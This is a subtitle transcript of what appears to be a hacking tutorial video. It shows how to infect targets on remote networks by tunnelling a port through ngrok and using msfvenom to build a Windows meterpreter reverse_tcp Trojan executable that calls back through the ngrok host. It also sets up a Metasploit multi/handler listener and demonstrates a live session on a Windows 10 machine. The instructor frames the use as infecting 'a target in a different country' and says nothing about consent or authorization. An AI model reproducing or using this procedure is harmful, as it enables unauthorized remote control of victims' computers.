1
00:00:00,240 --> 00:00:02,310
Instructor: Hello and welcome back.

2
00:00:02,310 --> 00:00:05,550
All of this time we only infected devices

3
00:00:05,550 --> 00:00:08,490
that were on our local network.

4
00:00:08,490 --> 00:00:10,440
But what if there is a person

5
00:00:10,440 --> 00:00:12,330
or a target in a different country

6
00:00:12,330 --> 00:00:14,760
that we want to infect with our payload?

7
00:00:14,760 --> 00:00:16,620
How can we do that?

8
00:00:16,620 --> 00:00:18,990
Well, we're going to see right now

9
00:00:18,990 --> 00:00:21,690
as you already mentioned at the end of the previous video,

10
00:00:21,690 --> 00:00:23,700
there are two different ways.

11
00:00:23,700 --> 00:00:26,670
There is a way of port forwarding on a router

12
00:00:26,670 --> 00:00:28,650
and I'm not going to show that right now

13
00:00:28,650 --> 00:00:30,300
because that would require you

14
00:00:30,300 --> 00:00:32,580
to have the access to the router

15
00:00:32,580 --> 00:00:34,080
and every router is different

16
00:00:34,080 --> 00:00:36,241
so the settings for the port forwarding

17
00:00:36,241 --> 00:00:40,110
could actually be completely different for you and me,

18
00:00:40,110 --> 00:00:43,440
but this method which is a method using a tool

19
00:00:43,440 --> 00:00:46,200
called ngrok, works on any network

20
00:00:46,200 --> 00:00:49,080
you do not have to have the access to your router

21
00:00:49,080 --> 00:00:50,760
You can just run this tool

22
00:00:50,760 --> 00:00:54,660
and you can hack a device on a completely different network

23
00:00:54,660 --> 00:00:57,120
in a completely different country.

24
00:00:57,120 --> 00:00:58,680
Let's see how we can do that.

25
00:00:58,680 --> 00:01:00,720
So the first thing that I want you to do

26
00:01:00,720 --> 00:01:02,670
is I want you to open your Google Chrome

27
00:01:02,670 --> 00:01:05,850
and type ngrok in your search bar.

28
00:01:05,850 --> 00:01:09,090
Once you do that, you should see this link and ngrok.com.

29
00:01:09,090 --> 00:01:13,350
Click on it, and it'll ask you to create an online account

30
00:01:13,350 --> 00:01:15,330
and this is something that you must do

31
00:01:15,330 --> 00:01:17,400
in order for this to work.

32
00:01:17,400 --> 00:01:20,010
So just go and sign up, create the account

33
00:01:20,010 --> 00:01:21,560
and once you create the account

34
00:01:22,860 --> 00:01:24,960
it'll lead you to this page right here

35
00:01:24,960 --> 00:01:27,880
where you will have the option to download the ngrok tool

36
00:01:28,740 --> 00:01:32,100
and you will also have three different steps

37
00:01:32,100 --> 00:01:35,250
as to how you can install and run the tool.

38
00:01:35,250 --> 00:01:38,763
So the first step is to download the ngrok and unzip it.

39
00:01:39,600 --> 00:01:41,280
We want to download it for Linux

40
00:01:41,280 --> 00:01:42,480
as we are running Kali Linux

41
00:01:42,480 --> 00:01:45,240
so I'm just going to go and save the file.

42
00:01:45,240 --> 00:01:47,310
Now all of the steps I already did,

43
00:01:47,310 --> 00:01:49,050
once you navigate to the downloads,

44
00:01:49,050 --> 00:01:51,990
you will have the ngok stable.zip file

45
00:01:51,990 --> 00:01:53,460
and you will notice I have two of them

46
00:01:53,460 --> 00:01:54,810
because as I mentioned,

47
00:01:54,810 --> 00:01:57,330
this is something that I already did.

48
00:01:57,330 --> 00:01:58,560
The next thing that you want to do

49
00:01:58,560 --> 00:02:01,050
is you want to move this file to your desktop

50
00:02:01,050 --> 00:02:03,753
and you want to run this command right here.

51
00:02:04,830 --> 00:02:07,620
Once run it, you want to connect it to your account

52
00:02:07,620 --> 00:02:10,530
by running the command under the step number two

53
00:02:10,530 --> 00:02:12,690
and that is the entire installation.

54
00:02:12,690 --> 00:02:14,613
After that, you will be good to go.

55
00:02:15,540 --> 00:02:19,323
So let's go back to our terminal and see how ngrok works.

56
00:02:20,400 --> 00:02:22,800
You have this file which you downloaded,

57
00:02:22,800 --> 00:02:25,440
you unzipped it and you got this file.

58
00:02:25,440 --> 00:02:27,480
This is the ngrok executable.

59
00:02:27,480 --> 00:02:32,140
In order to run this, we can type ./ngrok

60
00:02:32,140 --> 00:02:35,640
and after it we want to specify what port

61
00:02:35,640 --> 00:02:38,250
we want to port forward to their servers.

62
00:02:38,250 --> 00:02:41,130
They work similarly as port forwarding to the router.

63
00:02:41,130 --> 00:02:43,350
Just this time we're using their servers

64
00:02:43,350 --> 00:02:46,350
in order to perform the port forwarding.

65
00:02:46,350 --> 00:02:48,690
However, with the free version of ngrok

66
00:02:48,690 --> 00:02:52,530
the port might change every time you restart the tool.

67
00:02:52,530 --> 00:02:54,420
If you get the paid version of ngrok

68
00:02:54,420 --> 00:02:57,060
then I believe you can get a port forwarded

69
00:02:57,060 --> 00:02:59,370
which will be the same every time

70
00:02:59,370 --> 00:03:01,530
but we're going to go with the free version right now.

71
00:03:01,530 --> 00:03:06,360
So we can just type ./ngrok and we want to type tcp,

72
00:03:06,360 --> 00:03:07,560
which stands for the connection.

73
00:03:07,560 --> 00:03:09,690
We want to initiate a TCP connection

74
00:03:09,690 --> 00:03:13,200
and let's forward port 5555.

75
00:03:13,200 --> 00:03:14,760
This is the command that we want to run

76
00:03:14,760 --> 00:03:16,590
in order to run ngrok.

77
00:03:16,590 --> 00:03:18,633
Once you do that, press enter,

78
00:03:21,450 --> 00:03:23,910
and it'll start the tool.

79
00:03:23,910 --> 00:03:25,830
If it says session status online

80
00:03:25,830 --> 00:03:28,860
that means everything is working under the account.

81
00:03:28,860 --> 00:03:31,890
You will see your username, which you created

82
00:03:31,890 --> 00:03:33,480
once creating the online account.

83
00:03:33,480 --> 00:03:35,010
We can see the version of ngrok.

84
00:03:35,010 --> 00:03:37,830
We can see the region to where the port forwarded us

85
00:03:37,830 --> 00:03:41,460
and here is their server that they're using to

86
00:03:41,460 --> 00:03:43,860
port forward our port.

87
00:03:43,860 --> 00:03:46,020
This is the website or the link

88
00:03:46,020 --> 00:03:50,520
and this is the port that we want our targets to connect to.

89
00:03:50,520 --> 00:03:52,230
I know this might look confusing

90
00:03:52,230 --> 00:03:55,410
but just stick with me for a moment right now.

91
00:03:55,410 --> 00:03:57,630
So we got our ngrok tool ready.

92
00:03:57,630 --> 00:03:59,850
Now let's create our payload.

93
00:03:59,850 --> 00:04:02,485
I will zoom this in end,

94
00:04:02,485 --> 00:04:05,970
I'm going to navigate to the desktop.

95
00:04:05,970 --> 00:04:07,620
Great.

96
00:04:07,620 --> 00:04:10,110
There are two things that differentiate

97
00:04:10,110 --> 00:04:12,690
once creating a payload for the local area network

98
00:04:12,690 --> 00:04:14,220
and once creating a payload

99
00:04:14,220 --> 00:04:17,579
for a different network with the ngrok tool.

100
00:04:17,579 --> 00:04:19,709
And those two things are local host

101
00:04:19,709 --> 00:04:22,503
and local port that the target connects to.

102
00:04:23,880 --> 00:04:27,300
But before we even do that, what I want you to do is

103
00:04:27,300 --> 00:04:29,760
I want you to copy this link right here

104
00:04:29,760 --> 00:04:32,310
from the slashes up to the two dots.

105
00:04:32,310 --> 00:04:36,960
So 2.tcp.angrok.io, for you this might be a different link

106
00:04:36,960 --> 00:04:39,243
but I want you to copy only this part,

107
00:04:42,090 --> 00:04:43,470
Copy selection

108
00:04:43,470 --> 00:04:46,380
and I want you to run the command host

109
00:04:46,380 --> 00:04:49,023
and then paste this link.

110
00:04:50,490 --> 00:04:53,940
This host tool will give us the IP address of this link.

111
00:04:53,940 --> 00:04:58,940
So it tells us this link has address 3.138.45.170

112
00:05:01,050 --> 00:05:02,790
and this is the IP address

113
00:05:02,790 --> 00:05:06,483
that you will use as a local host for your payload creation.

114
00:05:07,320 --> 00:05:11,070
So let's go and type msfvenom -p.

115
00:05:11,070 --> 00:05:12,720
And for this video,

116
00:05:12,720 --> 00:05:14,760
we don't really need to attack an Android device.

117
00:05:14,760 --> 00:05:16,200
We are going to attack windows.

118
00:05:16,200 --> 00:05:17,280
It doesn't really matter.

119
00:05:17,280 --> 00:05:19,470
It'll work on both of those devices.

120
00:05:19,470 --> 00:05:20,550
So I'm just going to go with

121
00:05:20,550 --> 00:05:25,055
Windows/x64/meterpreter/reverse_tcp

122
00:05:25,055 --> 00:05:29,400
and I'm using X 64 because I'm attacking a 64-bit Windows

123
00:05:29,400 --> 00:05:31,080
you can adapt your payload

124
00:05:31,080 --> 00:05:32,670
to the machine that you're attacking,

125
00:05:32,670 --> 00:05:37,670
and after it we set the L host to be this IP address.

126
00:05:37,890 --> 00:05:39,300
Paste the selection,

127
00:05:39,300 --> 00:05:41,700
and the L port remember I also said that

128
00:05:41,700 --> 00:05:45,180
the L port is different, in this command.

129
00:05:45,180 --> 00:05:50,003
The L port is going to be this port right here, so 16722.

130
00:05:51,150 --> 00:05:54,990
For you once again, this port will probably be different.

131
00:05:54,990 --> 00:05:59,970
I'm going to copy it and I'm going to paste it right here

132
00:05:59,970 --> 00:06:03,250
and the output can be shell.exe

133
00:06:04,140 --> 00:06:05,970
I'll press enter,

134
00:06:05,970 --> 00:06:09,930
and in just a few seconds we have our payload ready.

135
00:06:09,930 --> 00:06:14,930
Now I'm just going to go and lower both of these terminals

136
00:06:15,660 --> 00:06:17,970
and I'm going to paste it

137
00:06:17,970 --> 00:06:21,843
or paste the payload onto my Windows 10 desktop.

138
00:06:22,740 --> 00:06:24,810
Here it is, but before I run it,

139
00:06:24,810 --> 00:06:29,400
of course I have to set up my MSF console listener,

140
00:06:29,400 --> 00:06:33,420
so I'm just going to go and enter MSF console.

141
00:06:33,420 --> 00:06:34,800
But you will notice that,

142
00:06:34,800 --> 00:06:39,000
as the local host and local port inside the MSF console

143
00:06:39,000 --> 00:06:41,850
we're not going to be using these two things.

144
00:06:41,850 --> 00:06:45,060
This IP address from this link and this port right here.

145
00:06:45,060 --> 00:06:48,120
We only use them for our payload creation

146
00:06:48,120 --> 00:06:51,210
in the MSF console we want to specify this.

147
00:06:51,210 --> 00:06:53,520
We want to specify the local host to be the host

148
00:06:53,520 --> 00:06:55,658
that we are listening for the incoming connections

149
00:06:55,658 --> 00:07:00,658
and port 5555 to be the local port that is also listening

150
00:07:00,690 --> 00:07:02,970
for the incoming connections.

151
00:07:02,970 --> 00:07:04,020
So let's go right here.

152
00:07:04,020 --> 00:07:07,150
First of all, we're going to use exploit multi handler

153
00:07:10,050 --> 00:07:12,750
Set the payload to the payload that you generated

154
00:07:12,750 --> 00:07:15,450
in case you're testing this on an Android device

155
00:07:15,450 --> 00:07:18,090
make sure you select the correct payload

156
00:07:18,090 --> 00:07:23,090
and the L host is going to be the IP address of 0.0.0.0

157
00:07:23,760 --> 00:07:28,020
which means we are listening on any interface whatsoever.

158
00:07:28,020 --> 00:07:32,460
You should also select and type right here 0.0.0.0

159
00:07:32,460 --> 00:07:34,235
and under the L port you want to

160
00:07:34,235 --> 00:07:36,600
type the port that you forwarded.

161
00:07:36,600 --> 00:07:38,820
In my case, it is 5555,

162
00:07:38,820 --> 00:07:41,523
so I'm going to type set L port 5555.

163
00:07:44,070 --> 00:07:47,700
Once you do this, you want to type run.

164
00:07:47,700 --> 00:07:50,520
It'll start listening for the connections

165
00:07:50,520 --> 00:07:54,600
on 0.0.0.0 on the port that you forwarded.

166
00:07:54,600 --> 00:07:57,363
And if I go right here and run this,

167
00:07:59,640 --> 00:08:03,180
for some reason it says this app cannot run on Windows.

168
00:08:03,180 --> 00:08:07,470
Let's see what the problem is.

169
00:08:07,470 --> 00:08:11,670
Hmm, it could be that x64 is presenting a problem

170
00:08:11,670 --> 00:08:14,670
for some reason, so we're just going to create

171
00:08:14,670 --> 00:08:17,040
another payload real quick.

172
00:08:17,040 --> 00:08:20,850
It might misconfigure something once I pasted it

173
00:08:20,850 --> 00:08:23,130
from the Kali Linux to the desktop,

174
00:08:23,130 --> 00:08:27,090
but nonetheless let's remove the current, shell.exe

175
00:08:27,090 --> 00:08:31,937
and let's run the previous command real fast.

176
00:08:31,937 --> 00:08:35,400
First thing is I need an IP address

177
00:08:35,400 --> 00:08:36,720
from this link right here

178
00:08:36,720 --> 00:08:40,080
so I'm just going to copy it once again

179
00:08:40,080 --> 00:08:44,820
and I'm going to type host and then paste this.

180
00:08:44,820 --> 00:08:47,340
Okay, once we get the IP address

181
00:08:47,340 --> 00:08:50,580
then we want to create payload, so msfvenom-p

182
00:08:50,580 --> 00:08:53,760
and let's just use the regular meterpreter payload

183
00:08:53,760 --> 00:08:56,460
which I don't believe this was an issue, but just in case.

184
00:08:56,460 --> 00:08:58,350
Let's go with the regular payload.

185
00:08:58,350 --> 00:09:02,253
L Host is going to be equal to this IP address.

186
00:09:06,720 --> 00:09:11,720
L port is going to be equal to 1 6 7 7 22

187
00:09:12,600 --> 00:09:15,960
which remember it is this port number right here

188
00:09:15,960 --> 00:09:19,050
and let's also add -f to be an exe

189
00:09:19,050 --> 00:09:21,630
just so we can specify that this is an exe file

190
00:09:21,630 --> 00:09:23,985
for some reason maybe this presented as a problem

191
00:09:23,985 --> 00:09:26,310
once we copied it to the desktop.

192
00:09:26,310 --> 00:09:30,210
And the output is going to be test.exe

193
00:09:30,210 --> 00:09:32,460
and let's just wait for this to finish.

194
00:09:32,460 --> 00:09:34,560
Okay, now it gives a different size.

195
00:09:34,560 --> 00:09:36,660
It could be that it was a problem

196
00:09:36,660 --> 00:09:39,480
because it didn't specify -f.exe.

197
00:09:39,480 --> 00:09:44,480
Nonetheless, let's go and copy the payload onto the desktop.

198
00:09:47,400 --> 00:09:52,400
Let's go and open the msfconsole and let's run the Trojan.

199
00:09:54,300 --> 00:09:57,360
Go back to Kali Linux, and here it is.

200
00:09:57,360 --> 00:10:00,000
We got the meterpreter session one opened

201
00:10:00,000 --> 00:10:02,530
from the local host on the target machine

202
00:10:03,480 --> 00:10:05,280
but it does tell us right here

203
00:10:05,280 --> 00:10:07,890
that the meterpreter session one died and that is because

204
00:10:07,890 --> 00:10:10,230
we actually misconfigured the payload right here

205
00:10:10,230 --> 00:10:13,530
since we set it up for the previous payload that didn't work

206
00:10:13,530 --> 00:10:16,440
therefore, it has this X 64

207
00:10:16,440 --> 00:10:18,090
just so we can make sure everything works.

208
00:10:18,090 --> 00:10:19,860
I'm going to set the payload to be

209
00:10:19,860 --> 00:10:24,860
Windows/meterpreter/reverse_tcp.

210
00:10:26,460 --> 00:10:28,260
Show options,

211
00:10:28,260 --> 00:10:30,000
Everything else is already set.

212
00:10:30,000 --> 00:10:31,950
Let's run the listener once again

213
00:10:31,950 --> 00:10:34,860
and let's run the payload once again

214
00:10:34,860 --> 00:10:37,110
and right now everything works.

215
00:10:37,110 --> 00:10:39,990
We got the meterpreter session to open

216
00:10:39,990 --> 00:10:42,460
and we can run all of the commands

217
00:10:43,440 --> 00:10:45,630
the tower meterpreter gives us.

218
00:10:45,630 --> 00:10:46,500
Awesome.

219
00:10:46,500 --> 00:10:50,130
Now, this attack will work on any device in the world

220
00:10:50,130 --> 00:10:52,110
because they're not really connecting

221
00:10:52,110 --> 00:10:53,940
straight to our machine.

222
00:10:53,940 --> 00:10:58,440
They're connecting to this link right here, and to this port

223
00:10:58,440 --> 00:11:00,420
and what ngrok is doing for us

224
00:11:00,420 --> 00:11:04,200
is it is forwarding their connection back to our machine

225
00:11:04,200 --> 00:11:06,750
on the local host, and on this port.

226
00:11:06,750 --> 00:11:08,640
That's why in the MSF console

227
00:11:08,640 --> 00:11:11,970
we are listening on this port and on the local host.

228
00:11:11,970 --> 00:11:13,470
While in the payload creation

229
00:11:13,470 --> 00:11:17,070
we specify that the target should connect right here.

230
00:11:17,070 --> 00:11:18,750
Then they forward the connection

231
00:11:18,750 --> 00:11:23,490
and we get our meterpreter session opened.

232
00:11:23,490 --> 00:11:27,693
And from there we can execute all of the commands as usual.

233
00:11:29,250 --> 00:11:30,083
Awesome.

234
00:11:30,083 --> 00:11:32,160
Now, let me know if you also want me to show you

235
00:11:32,160 --> 00:11:34,740
the port forwarding, how it looks on my router,

236
00:11:34,740 --> 00:11:36,360
in case you want to see that.

237
00:11:36,360 --> 00:11:38,610
But nonetheless, this is the best way

238
00:11:38,610 --> 00:11:40,680
that you can actually perform port forwarding

239
00:11:40,680 --> 00:11:43,650
without needing an access to the router.

240
00:11:43,650 --> 00:11:44,483
Thank you for watching

241
00:11:44,483 --> 00:11:46,443
and I will see you in the next video.